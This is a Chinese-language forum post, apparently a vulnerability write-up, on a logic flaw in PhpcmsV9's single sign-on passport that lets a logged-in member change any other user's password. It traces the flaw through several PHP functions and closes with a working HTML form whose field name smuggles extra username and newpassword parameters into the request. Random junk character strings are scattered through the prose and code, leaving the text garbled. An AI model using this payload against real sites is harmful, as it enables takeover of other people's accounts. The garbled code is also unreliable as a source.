PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发

admin

提到的通行证的代码：
, J8 p4 N+ B8 T9 `; ^# ?

- t' N  b$ J9 {parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);

在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
) h1 O! _. d: _
我把它留给了你们。
* Y# Z3 t4 D8 v8 ]% a4 Z不知道你们发现了它没有。

我们知道parse_str类似将http请求转换成php变量的函数，所以，也像http请求在php的环境下一样，如果提交?a=sss&a=aaa，那么a的结果会是aaa，不是sss。

所以我们知道这个函数有一个问题了，如果后面提交一个内容，它会覆盖前面的。

也就是

username=zhangsan&username=lisi的话，那么用户名就不是zhangsan了。
' a  b* a, L; \& m
2 Y* j' |  _2 y2 Z) Z: U+ }要构造这样的请求，我们还是要回到通行证的client看看，我们有没有这样的机会。


5 R9 |. p! r0 \* @其实我们有这样的机会，看看代码，如下：


public function auth_data($data) {
; x1 z' V0 L" z                $s = $sep = '';
% ?% T" ^& _( T3 ]. f* n7 l                foreach($data as $k => $v) {
                        if(is_array($v)) {
                                $s2 = $sep2 = '';
4 `" J# a! p; Q9 ^                                foreach($v as $k2 => $v2) {
  {0 L+ i$ o! q7 i- [, g3 d& g; {                                                $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
                                        $sep2 = '&';
5 e3 X# J. @6 V9 b6 j' ]0 O. d                                }
4 c" P6 ?5 J+ f6 m4 r: k5 ?                                $s .= $sep.$s2;
9 t# C1 @+ Z: q' L4 v/ z: i* J                        } else {
                                $s .= "$sep$k=".$this->_ps_stripslashes($v);
                        }
& @% h( s6 r' A' q                        $sep = '&';
                }
0 o" K) I' K1 u& b% C6 F* ~
5 l0 ?- q6 ]) o                $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
' t+ F* G4 [+ R$ o, P, ~/ ?                return $auth_s;
        }
- Y3 n/ I/ l7 e) p+ r
可能我没说明白，对，传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话，那么我就能重写这样的东西。

1 h, }( G; E5 ?! i- D* _举个例子
: G7 y0 k4 s) [/ k) }
# E7 O& X5 N% j+ o% i$a[aaa=a&bbb] = 'a';
: T& U# O/ ?5 x3 o2 y, e7 q
' Y( @# }. d8 l' D& Q会变成aaa=a&bbb=a
) I! u+ K- n7 s) d9 J
" j" [  C# E7 S, ^1 \6 k明白了么，对，就是通过没有注意到的key，我们可以构造出多余的参数来。

+ g; v8 t1 E. Y1 x+ M0 j这个时候，我们可以再去看一个函数。
3 y+ n6 @9 T( V8 [
就在这个文件内：


5 h) O- J, m/ l  Lpublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
0 z2 U9 ]2 C. U                if($email && !$this->_is_email($email)) {
                        return -4;
                }
* T  E+ s& n' v( r                return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
! |# \- Z( u  f5 d2 F1 p5 W        }

3 c0 s; B7 M1 ?, v' K+ D9 @这是向通行证发了这样一个请求。
3 w; Z- H( w* q% g$ L8 i1 B! _/ @  N
我们再跟到通信证代码里去看看，就会有所发现。


public function edit() {
) z6 R- X2 w* _- _  }//能省就省，太长了不是吗？

if($this->username) {
//如果提交了用户名，则按照用户名修改记录，反之，按照uid来修改记录。
( t4 w1 y; H' S2 Q: X3 z                                $res = $this->db->update($data, array('username'=>$this->username));
                        } else {
& X! ~) P2 d" m* E9 m                                file_put_contents('typeb.txt',print_r($data,1).$this->uid);
" M) o' S8 S+ x  M                                $res = $this->db->update($data, array('uid'=>$this->uid));
                        }

好，我们知道了，如果提交了用户名，就会按照用户名来修改记录，不然就按照uid，我们看看函数结构：
+ R: g9 L# w& N: c
1 f6 b- B. O1 W- |' _public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
+ \6 j2 c( y7 V6 q* E& G9 W
$ v1 p" o3 q2 R1 |很好，uid要是无法控制的话，后面只剩下一个random了，但是username就在第一个，只要email，password，newpassword，有任何一个可以控制，就可以修改密码了。
# E* i. o) N/ F0 o
) I7 m- N. x* }/ {我当然找到了：
  r* n+ n3 `6 x  E: Hphpcms9/phpcms/modules/member/index.php
: j8 t; L/ i; R; s$ E
$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);

: [5 w8 z' n& M0 M; X9 n- p' @2 r' v$ {然后就没有然后了。
  |# w" R& z. H0 @. _2 j
0 ^; s/ X9 v- ^) F0 e0 v! u2 E<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
                                <table width="100%" cellspacing="0" class="table_form">
                                        <tr>
' l( _) |$ A( ^% p                                                <th width="80">邮箱：</th>        
                                                <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
                                        </tr>
                                        <tr>
                                                <th width="80">原密码：</th>        
                                                <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
                                        </tr>
                                        <tr>
                                                <th>新密码：</th>
$ v; L2 P! S- n- I                                                <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>
                                        </tr>
: x0 t" y# e) L' r- P                                        <th></th>
                                        <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
                                        </tr>
                                </table>

3 g! X$ `9 N; h+ `; i& f, [0 v                               
                        </form>
1 x1 R5 M. v+ ~6 f$ i